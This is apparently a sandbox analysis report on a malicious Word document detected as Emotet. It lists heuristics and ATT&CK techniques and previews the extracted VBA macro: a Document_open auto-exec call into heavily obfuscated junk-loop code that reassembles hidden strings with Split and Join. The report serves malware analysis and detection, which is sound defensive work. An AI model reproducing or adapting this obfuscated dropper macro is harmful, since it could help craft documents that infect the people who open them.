MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Malware.Emotet-7540219-0', strongly indicating the Emotet family. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes a 'GetObject' call, a common technique for executing malicious code. The VBA code appears obfuscated but the presence of these elements suggests the macro's purpose is to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Malware.Emotet-7540219-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emotet-7540219-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11139 bytes |
SHA-256: e27417742d7119688d67fc189fe3abeeca8bc8bb5082e13849168b82b627a447 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Rncwejxkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Iiyvvjoo
End Sub
Attribute VB_Name = "Whaeodtqkqi"
Attribute VB_Base = "0{52D0F05A-089C-4C08-9B1B-AB764DB4D7B5}{36B4AEC5-77EA-4BAB-AC54-D80C3EA04A94}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Aplhseob"
Function Yenwuidyxwz()
Do While Jmgtmxgu = 9875
Do While Okladkfofrymd = 34
Fvatlefspdlgu = Cos(8 + CStr(750))
Loop
Do While Nfotlpltbvw = 123
Kewjjwhbf = Vjswwrelcoet
Khuczxoeyi = 3253
Loop
Do While Cwyfohevy = 667
Owjrlxrfkyzzo = CDbl(324)
Gceqkjkqphnwa = Int(496)
Loop
Do While Clikffpgdhh = 2342
Hcxjsobb = CInt(Soegujyar)
Loop
Do While Woqdhtrwbidhj = 3247
Jdelvnkcpwa = Sgn(713)
Xegpsekngfku = CByte(Qzoguxhzv + Oimmbhguw)
Loop
Loop
Bhmfieewqmax = ChrW(wdKeyP)
Do While Uaufrffcie = 9875
Do While Hyhfzjzzj = 34
Ztebuipda = Cos(8 + CStr(750))
Loop
Do While Ijpugstoh = 123
Sxbpmdwclzvvu = Elutaeeapx
Cggvsldah = 3253
Loop
Do While Vlhyqgmou = 667
Nitntrnwlswz = CDbl(324)
Fedjqleegyht = Int(496)
Loop
Do While Ucjvvitybes = 2342
Lomzmndlcj = CInt(Xpjbvgzk)
Loop
Do While Iibdlchc = 3247
Eytqtzufddr = Sgn(713)
Rysjwgysc = CByte(Fdxjcadzkn + Wtivlugwkqeke)
Loop
Loop
Yzofkzbu = Bhmfieewqmax + Whaeodtqkqi.Ekqdonwu + Whaeodtqkqi.Wnbyoebd
Do While Qnfrughmtanf = 9875
Do While Wnrtcnbetzjp = 34
Kzrnucvavp = Cos(8 + CStr(750))
Loop
Do While Oevffomw = 123
Ctgutmtgied = Tjzkswws
Zzxinuudhjvx = 3253
Loop
Do While Aiihpgvar = 667
Wfetaewz = CDbl(324)
Vvdflnbwn = Int(496)
Loop
Do While Lskjnodvyzivg = 2342
Qkgezxyafnf = CInt(Stddwfln)
Loop
Do While Mptebhmzxo = 3247
Rpjgynrewinzc = Sgn(713)
Ezagbvauogtw = CByte(Nimgvcouphxv + Dctcwliawi)
Loop
Loop
Ctnwawndbnwwg = Split(Yzofkzbu + LTrim(LTrim(Whaeodtqkqi.Zazqvyncyowi. _
Tag)), ",,,,sdf7&&jsad,,,")
Do While Lmwfcmwjdvx = 9875
Do While Rborgbgodrg = 34
Nvlzgssowbrl = Cos(8 + CStr(750))
Loop
Do While Aftmqgvtudj = 123
Daiuqzjz = Doeqcuzwfsmgi
Pzxtbipfs = 3253
Loop
Do While Ogaleqyhpym = 667
Yugeiowrypbz = CDbl(324)
Apojmbogs = Int(496)
Loop
Do While Owibtgcjfvgc = 2342
Etwprzltkyrbp = CInt(Erbkkuroqfi)
Loop
Do While Fjtncmihrrb = 3247
Uljkrrcvb = Sgn(713)
Rbbmfgkjb = CByte(Aedzcrgmazn + Fegnqvuegovbk)
Loop
Loop
Yenwuidyxwz = Zlcfvwfxnhb + Join(Ctnwawndbnwwg, "") + Zlcfvwfxnhb
Do While Jhbqjhfftekb = 9875
Do While Vvdulhuz = 34
Kiirqgyi = Cos(8 + CStr(750))
Loop
Do While Ogjwzpfdphryb = 123
Zpwvibkf = Bznonfcsb
Mgvvbqjvjlg = 3253
Loop
Do While Rqcmaxebirx = 667
Obbpgaymmjbz = CDbl(324)
Ajrtuewxxd = Int(496)
Loop
Do While Dlmeoxfjciuu = 2342
Weehanumd = CInt(Yclwqexzown)
Loop
Do While Uduwispxoo = 3247
Tpcbxqhunqvt = Sgn(713)
Dwuqkievnx = CByte(Elcskodexpvyr + Fvdiajwot)
Loop
Loop
End Function
Fun
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.